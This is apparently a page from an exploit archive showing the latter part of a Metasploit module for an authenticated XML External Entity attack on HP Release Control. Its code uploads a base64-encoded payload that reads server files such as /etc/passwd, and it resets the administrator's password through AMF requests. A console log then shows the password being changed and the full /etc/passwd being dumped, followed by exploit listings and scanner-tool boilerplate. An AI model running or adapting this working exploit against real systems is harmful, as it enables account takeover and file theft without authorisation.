3lBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5MaW5lIExhYmVsPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPkFibm9ybWFsIENoYW5nZXM8L3Nlcmllc0xhYmVsPjwvTGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PHR5cGU+TGluZUNoYXJ0PC90eXBlPjxuYW1lPkFibm9ybWFsIENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjMyOWM4MTJjNTE3ODNlOWU6NmE5NTIwZjM6MTE2Mzk4MTdkYTI6LTdmZWI8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+T1VUQ09NRV9PVkVSX1RJTUVfREFUQV9TT1VSQ0U8L2lkPjxuYW1lPk91dGNvbWUgT3ZlciBUaW1lPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5GaWx0ZXI8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5GaWx0ZXI6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWUvPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5Hcm91cCBCeTwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0Pkdyb3VwIEJ5OjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlt3ZWVrXVtXZWVrXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48L0J1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48Y2hhcnRUaXRsZT5PdXRjb21lIE92ZXIgVGltZTwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2U+Q29sb3I8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPlRvb2x0aXA8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+UGVyY2VudGFnZTwveUF4aXNTb3VyY2U+PHlBeGlzTGFiZWw+UGVyY2VudGFnZTwveUF4aXNMYWJlbD48c2VyaWVzU291cmNlPk91dGNvbWU8L3Nlcmllc1NvdXJjZT48c2VyaWVzTGFiZWw+T3V0Y29tZTwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+T3V0Y29tZSBPdmVyIFRpbWU8L25hbWU+PHV1aWQ+NmEzNjczYzlmZWI3NmRjYjotMzYyNTYxNjY6MTE3MmIyOTE1YTI6LTdmZjQ8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjwvRXhwb3J0TGlzdD4NCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVwbGFjZVBvcnRsZXREZWZzIg0KDQpZDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NjI3MDc2NjcxNDgyNDUyMDYwNDY2NDk5OTI2DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9Ii5yZXBsYWNlTW9kdWxlcyINCg0KWQ0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIudHJpYWwiDQoNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDYyNzA3NjY3MTQ4MjQ1MjA2MDQ2NjQ5OTkyNg0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSIucmVuYW1lU3VmZml4Ig0KDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ2MjcwNzY2NzE0ODI0NTIwNjA0NjY0OTk5MjYtLQ==")

    data = data.sub('/etc/passwd', datastore['FILEPATH'])

    res = send_request_cgi({
      'uri' => '/ccm/dashboard/app/migrator/ImportResult.jsp',#normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ImportResult.jsp?IS_WINDOID=Y'),
      'method' => 'POST',
      'ctype' => 'multipart/form-data; boundary=---------------------------14627076671482452060466499926',
      'cookie' => cookie,
      'data' => data.to_s
    })

    select(nil, nil, nil, 5)
    post = {
      'com.mercury.dashboard.arch.fieldtree.formForFieldtree.' => 'Y',
      '.exportPortletDefsLabel' => '',
      '.exportPortletDefsHidden' => '',
      '.exportModulesLabel' => 'Release Control Default Module',
      '.exportModulesHidden' => '[98304][Release Control Default Module]'
    }

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ccm', 'dashboard', 'app', 'migrator', 'ExportResult.jsp?ISWINDOID=Y'),
      'method' => 'POST',
      'data' => 'com.mercury.dashboard.arch.fieldtree.formForFieldtree.=Y&.exportPortletDefsLabel=&.exportPortletDefsHidden=&.exportModulesLabel=Release+Control+Default+Module&.exportModulesHidden=%5B98304%5D%5BRelease+Control+Default+Module%5D',
      'cookie' => cookie
    })

    doc = REXML::Document.new res.body

    file = ''
    doc.elements.each('/ExportList/Module/description') do |element|
      file = element.text
    end

    print file
  end

  def change_admin_password(cookie, admin_id)
    req = Rex::Text::decode_base64("AAMAAAAEAARudWxsAAMvMzD/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgY9dXBkYXRlVXNlcldvcmtzcGFjZUxhbmRpbmdQYWdlCQMBAwEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkDAQMGSURFMDdDODYxLTBBOUUtMTE2MC0xMzkyLUZEOEZBRkQ3REQ3QgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMx/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGM3VwZGF0ZUdlbmVyYWxVc2VyU2V0dGluZ3MJCwECBgtlbl9VUwYVRXRjL0dNVCsxMgMDAQEBCgdDZmxleC5tZXNzYWdpbmcuaW8uQXJyYXlDb2xsZWN0aW9uCQsBAgYkBiYDAwZJQTlCNUZBRkQtQzA0Ny0zMDcyLThDQUEtRkQ4RkFGRDc2OERCBQAAAAAAAAAABklERDZEMTNENS0yMTBDLTJEMDktMDBCOS1DNTRFRTc1NzQ1MjYGF3VzZXJTZXJ2aWNlAARudWxsAAMvMzL/////EQkDAQqBQ09mbGV4Lm1lc3NhZ2luZy5tZXNzYWdlcy5SZW1vdGluZ01lc3NhZ2UTdGltZXN0YW1wD2hlYWRlcnMTb3BlcmF0aW9uCWJvZHkNc291cmNlHXJlbW90ZVBhc3N3b3JkHXJlbW90ZVVzZXJuYW1lFXBhcmFtZXRlcnMTbWVzc2FnZUlkFXRpbWVUb0xpdmURY2xpZW50SWQXZGVzdGluYXRpb24FAAAAAAAAAAAKIwEJRFNJZBVEU0VuZHBvaW50BklERDY4RURERS01NjFBLTMzRTQtNDU1OC04OEU3RkY2RTFDMUUGDW15LWFtZgYldXBkYXRlVXNlclBhc3N3b3JkCQUBBg8xNzY5NDcyBhFwYXNzdzByZAEBAQoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkFAQYkBiYGSUREQTlENDQ1LUNFNDgtQTFDMy00MjNBLUZEOEZBRkQ4OUUzRQUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQAEbnVsbAADLzMz/////xEJAwEKgUNPZmxleC5tZXNzYWdpbmcubWVzc2FnZXMuUmVtb3RpbmdNZXNzYWdlE3RpbWVzdGFtcA9oZWFkZXJzE29wZXJhdGlvbglib2R5DXNvdXJjZR1yZW1vdGVQYXNzd29yZB1yZW1vdGVVc2VybmFtZRVwYXJhbWV0ZXJzE21lc3NhZ2VJZBV0aW1lVG9MaXZlEWNsaWVudElkF2Rlc3RpbmF0aW9uBQAAAAAAAAAACiMBCURTSWQVRFNFbmRwb2ludAZJREQ2OEVEREUtNTYxQS0zM0U0LTQ1NTgtODhFN0ZGNkUxQzFFBg1teS1hbWYGK3VwZGF0ZVVzZXJCdXNpbmVzc0NJcwkHAQYPMTc2OTQ3MgoHQ2ZsZXgubWVzc2FnaW5nLmlvLkFycmF5Q29sbGVjdGlvbgkBAQoJCQEBAQEBCgkJBwEGJAoICgwGSUU0QTk2NjU5LTQ4ODItOTc2Ny1DMzNBLUZEOEZBRkQ5NEZCQgUAAAAAAAAAAAZJREQ2RDEzRDUtMjEwQy0yRDA5LTAwQjktQzU0RUU3NTc0NTI2Bhd1c2VyU2VydmljZQo=")
    password = Rex::Text::rand_text_alpha(8)
    req = req.sub("\x0f1769472", "\x0d"+admin_id).sub("passw0rd", password)
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amf'),
      'method' => 'POST',
      'ctype' => 'application/x-amf',
      'data' => req,
      'cookie' => cookie
    })

    return password
  end

  def get_admin_id(cookie)
    req = Rex::Text::decode_base64("AAMAAAABAARudWxsAAMvMjkAAAIPCgAAAAERCoETT2ZsZXgubWVzc2FnaW5nLm1lc3NhZ2VzLlJlbW90aW5nTWVzc2FnZRNvcGVyYXRpb24Nc291cmNlCWJvZHkTbWVzc2FnZUlkE3RpbWVzdGFtcBFjbGllbnRJZBV0aW1lVG9MaXZlD2hlYWRlcnMXZGVzdGluYXRpb24GFXNlYXJjaFVzZXIBCREBCoFTVWNvbS5tZXJjdXJ5Lm9ueXguY2xpZW50LnNlcnZpY2VzLnZvLlVzZXJWTx91c2VyUGVybWlzc2lvbnMRcGFzc3dvcmQLZW1haWwRdXNlckFwcHMddXNlclNldHRpbmdzVk8TdXNlclJvbGVzHWxpbmVPZkJ1c2luZXNzEWxhc3ROYW1lDXVzZXJJRBNsb2dpbk5hbWUTZmlyc3ROYW1lFWJ1c2luZXNzSWQLbGFiZWwKB0NmbGV4Lm1lc3NhZ2luZy5pby5BcnJheUNvbGxlY3Rpb24JAQEBAQoJCQEBAQoJCQEBAQEBAQEBAQEGLAMJAQEEGQQBBAEGSThFNTBBNDUzLUQwRDMtMkVCNC1BNDkzLTAyMTM0RDdEM0E3NgQAAQQACgsBFURTRW5kcG9pbnQGG215LXNlY3VyZS1hbWYJRFNJZAZJRTg3MjYzOUQtOTkwRS0zOUI5LTA1MUMtMDlBOUM1RUJDQUUwAQYXdXNlclNlcnZpY2UK")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'ccm', 'messagebroker', 'amfsecure'),
      'method' => 'POST',
      'ctype' => 'application/x-amf',
      'data' => req,
      'cookie' => cookie
    })
    
    begin
      idx = res.body.index("admin admin")
      idx = idx + "admin admin".length + 25 + 1 + 1
      id = res.body[idx+1..idx+6]
      return id
    rescue
      return nil
    end
  end
end

__END__

msf auxiliary(hp_release_control_xxe) > show options

Module options (auxiliary/gather/hp_release_control_xxe):

   Name       Current Setting         Required  Description
   ----       ---------------         --------  -----------
   FILEPATH   /etc/passwd             yes       The filepath to read on the server
   PASSWORD   passw0rd                yes       The password to authenticate with
   Proxies    http:192.168.1.45:8080  no        Use a proxy chain
   RHOST      192.168.1.109           yes       The target address
   RPORT      8080                    yes       The target port
   TARGETURI  /                       yes       Base directory path
   USERNAME   username                yes       The username to authenticate with
   VHOST                              no        HTTP server virtual host

msf auxiliary(hp_release_control_xxe) > run

[*] Authenticating
[*] Found admin id: 229376
[*] Changing admin's password...
[*] Changed admin password to: ZaDdExMx
[-] Auxiliary failed: RuntimeError Login failed: 
[-] Call stack:
[-]   /home/bperry/Projects/metasploit-framework/lib/msf/core/module.rb:745:in `fail_with'
[-]   /home/bperry/Projects/metasploit-framework/modules/auxiliary/gather/hp_release_control_xxe.rb:108:in `run'
[*] Auxiliary module execution completed
msf auxiliary(hp_release_control_xxe) > run

[*] Authenticating
[*] Found admin id: 229376
[*] Changing admin's password...
[*] Changed admin password to: upvsoveu
[*] Exploiting XXE...
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
release-control:x:500:500::/opt/HP/rc:/bin/bash
rtkit:x:498:496:RealtimeKit:/proc:/sbin/nologin
pulse:x:497:495:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
fdsa:x:501:501::/home/fdsa:/bin/bash
[*] Auxiliary module execution completed
msf auxiliary(hp_release_control_xxe) >

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2015-04-29	"OS Solution OSProperty 2.8.0 - SQL Injection"	webapps	php	"Brandon Perry"
2015-03-19	"Joomla! Component ECommerce-WD 1.2.5 - SQL Injection"	webapps	php	"Brandon Perry"
2015-03-04	"SolarWinds Orion Service - SQL Injection"	webapps	windows	"Brandon Perry"
2015-02-16	"eTouch SamePage 4.4.0.0.239 - Multiple Vulnerabilities"	webapps	php	"Brandon Perry"
2014-11-26	"Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)"	webapps	cgi	"Brandon Perry"
2014-11-26	"Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)"	webapps	cgi	"Brandon Perry"
2014-10-27	"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation"	webapps	jsp	"Brandon Perry"
2014-07-21	"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)"	webapps	linux	"Brandon Perry"
2014-05-19	"HP Release Control - (Authenticated) XML External Entity (Metasploit)"	webapps	windows	"Brandon Perry"
2014-05-02	"F5 BIG-IQ 4.1.0.2013.0 - Privilege Escalation (Metasploit)"	remote	hardware	"Brandon Perry"
2014-04-15	"Xerox DocuShare - SQL Injection"	webapps	hardware	"Brandon Perry"
2014-04-15	"Unitrends Enterprise Backup 7.3.0 - Root Remote Code Execution (Metasploit)"	remote	unix	"Brandon Perry"
2014-04-01	"Alienvault 4.5.0 - (Authenticated) SQL Injection (Metasploit)"	webapps	php	"Brandon Perry"
2014-03-31	"EMC Cloud Tiering Appliance 10.0 - XML External Entity Arbitrary File Read (Metasploit)"	webapps	multiple	"Brandon Perry"
2014-03-22	"LifeSize UVC 1.2.6 - (Authenticated) Remote Code Execution"	webapps	php	"Brandon Perry"
2014-03-19	"McAfee Asset Manager 6.6 - Multiple Vulnerabilities"	webapps	jsp	"Brandon Perry"
2005-08-10	"Gaim AIM/ICQ Protocols - Multiple Vulnerabilities"	dos	windows	"Brandon Perry"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"HP Release Control - (Authenticated) XML External Entity (Metasploit)"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.